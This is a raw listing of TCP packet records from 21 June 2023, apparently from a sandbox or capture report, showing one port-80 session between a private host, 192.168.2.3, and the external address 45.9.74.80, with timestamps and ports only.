Jun 21, 2023 04:27:57.751821995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751867056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751913071 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.751960039 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752003908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752048969 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752094984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752139091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752185106 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752228975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752294064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752341986 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752389908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752435923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752482891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752528906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752573967 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752620935 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752667904 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752713919 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.752760887 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.753043890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.753205061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.753226042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.753226042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.753263950 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.753282070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.753315926 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.766315937 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766374111 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766421080 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766467094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766498089 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.766520023 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.766561985 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766604900 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766654968 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766668081 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.766710997 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766753912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766789913 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.766814947 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766834021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.766834021 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.766865015 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.766895056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766936064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766976118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.766997099 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767034054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767065048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767088890 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767106056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767148972 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767165899 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767200947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767225027 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767265081 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767287016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767323971 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767339945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767383099 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767404079 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767447948 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767462969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767507076 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767519951 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767558098 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767575026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767623901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767636061 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767673016 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767693043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767740011 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767752886 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767791033 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767808914 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767848015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767865896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767903090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.767920017 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767961025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.767978907 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768019915 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768038988 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768078089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768100023 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768125057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768152952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768203974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768217087 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768254042 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768307924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768357992 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768371105 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768402100 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768428087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768470049 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768521070 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768533945 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768573999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768614054 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768631935 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768671036 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768713951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768738985 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768762112 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768790007 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768830061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768872976 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768893003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.768933058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768979073 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.768992901 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.769026041 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.769052029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769090891 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769133091 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769153118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.769181013 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.769207954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769253969 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769267082 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.769296885 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.769321918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769364119 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769411087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769423962 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.769463062 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769514084 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769529104 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.769568920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.769648075 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778207064 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778270960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778323889 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778353930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778397083 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778453112 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778471947 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778523922 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778538942 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778583050 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778625965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778625965 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778667927 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778714895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778763056 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778783083 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778825998 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778844118 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778875113 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.778906107 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.778951883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779005051 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779017925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779061079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779105902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779126883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779156923 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779187918 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779233932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779278994 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779298067 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779340029 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779390097 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779403925 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779438019 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779464960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779514074 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779560089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779582024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779628038 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779671907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779715061 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779758930 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779783010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779825926 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779870033 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779891014 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.779934883 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779979944 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.779999971 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780044079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780088902 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780108929 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780143023 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780172110 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780234098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780299902 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780325890 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780370951 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780415058 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780436039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780478954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780527115 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780570030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780591011 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780637026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780682087 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780729055 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780750990 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780786037 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780813932 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780860901 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780908108 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.780936003 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780965090 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.780992031 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.781038046 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.781102896 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.794939041 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795001984 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795053959 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795099974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795130968 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.795165062 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.795200109 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795248032 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795296907 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795322895 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.795367956 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795414925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795447111 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.795481920 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795533895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795583010 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795603037 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.795648098 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795694113 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795717001 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.795752048 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.795778990 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795826912 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795876026 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795898914 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.795943975 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.795993090 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796015024 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796058893 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796104908 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796150923 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796171904 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796205044 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796235085 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796304941 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796355009 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796375036 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796417952 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796463966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796487093 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796530008 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796575069 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796618938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796642065 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796684980 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796731949 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796753883 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796791077 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796813965 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796863079 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796909094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.796931982 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.796976089 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797022104 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797044039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797086954 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797132015 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797178030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797198057 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797243118 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797288895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797310114 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797343969 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797370911 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797416925 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797463894 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797488928 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797533989 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797580004 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797632933 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797656059 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797699928 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797746897 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797769070 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797812939 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797858000 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797878981 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797918081 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.797940969 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.797987938 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798034906 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798054934 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.798099995 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798150063 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798171043 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.798218966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798266888 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798316002 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798357010 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.798403025 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798445940 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798470020 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.798512936 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798557043 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798579931 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.798624039 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.798640966 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798686981 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798734903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798754930 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.798800945 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798846960 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798866987 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.798909903 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.798954964 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799000978 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799021959 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.799067974 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799112082 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799132109 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.799170017 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.799196005 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799242973 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799297094 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799310923 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.799355030 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799401999 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799422026 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:57.799465895 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799511909 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799557924 CEST	80	49719	45.9.74.80	192.168.2.3
Jun 21, 2023 04:27:57.799576998 CEST	49719	80	192.168.2.3	45.9.74.80
